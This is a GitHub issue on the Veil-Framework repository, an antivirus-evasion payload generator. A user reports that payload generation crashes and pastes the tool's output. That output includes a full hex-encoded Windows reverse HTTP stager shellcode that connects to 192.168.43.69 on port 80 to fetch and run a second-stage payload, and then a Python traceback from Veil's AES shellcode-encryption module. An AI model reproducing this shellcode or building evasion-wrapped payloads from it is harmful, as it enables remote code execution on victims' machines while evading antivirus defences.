Veil-Framework / Veil

Veil 3.1.X (Check version info in Veil at runtime)
GNU General Public License v3.0
3.96k stars 881 forks source link

payload generating issues #468

Open mike394 opened 2 years ago

mike394 commented 2 years ago

[] Payload Name: Reverse HTTP Stager (Stage 1) [] IP Address: 192.168.43.69 [] Port: 80 [] Shellcode Size: 331

\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\x68\x3a\x56\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53\x68\x50\x00\x00\x00\xeb\x3a\x50\x68\x57\x89\x9f\xc6\xff\xd5\x53\x68\x00\x02\x60\x84\x53\x53\x53\xeb\x29\x53\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x96\x6a\x10\x5f\x53\x53\x53\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x18\x4f\x75\xed\x68\xf0\xb5\xa2\x56\xff\xd5\xeb\x42\xe8\xd2\xff\xff\xff\x2f\x4c\x69\x70\x37\x00\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xbf\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\x7d\xff\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x33\x2e\x36\x39\x00

Half way... Shellcode generated with Veil-Ordnance! Returning to Veil-Evasion. Traceback (most recent call last): File "/usr/share/veil/./Veil.py", line 145, in the_conductor.main_menu() File "/usr/share/veil/lib/common/orchestra.py", line 127, in main_menu tool_object.tool_main_menu() File "/usr/share/veil/tools/evasion/tool.py", line 368, in tool_main_menu self.use_payload(selected_payload_module) File "/usr/share/veil/tools/evasion/tool.py", line 400, in use_payload selected_payload.generate() File "/usr/share/veil/tools/evasion/payloads/python/shellcode_inject/aes_encrypt.py", line 89, in generate encoded_ciphertext, encryption_key, iv_value = encryption.aes_encryption(Shellcode) File "/usr/share/veil/tools/evasion/evasion_common/encryption.py", line 21, in aes_encryption aes_cipher_object = AES.new(random_aes_key, AES.MODE_CBC, iv) File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 232, in new return _create_cipher(sys.modules[name], key, mode, *args, kwargs) File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/init.py", line 79, in _create_cipher return modes[mode](factory, kwargs) File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/_mode_cbc.py", line 274, in _create_cbc_cipher cipher_state = factory._create_base_cipher(kwargs) File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 103, in _create_base_cipher result = start_operation(c_uint8_ptr(key), File "/usr/lib/python3/dist-packages/Cryptodome/Util/_raw_api.py", line 143, in c_uint8_ptr raise TypeError("Object type %s cannot be passed to C code" % type(data)) TypeError: Object type <class 'str'> cannot be passed to C code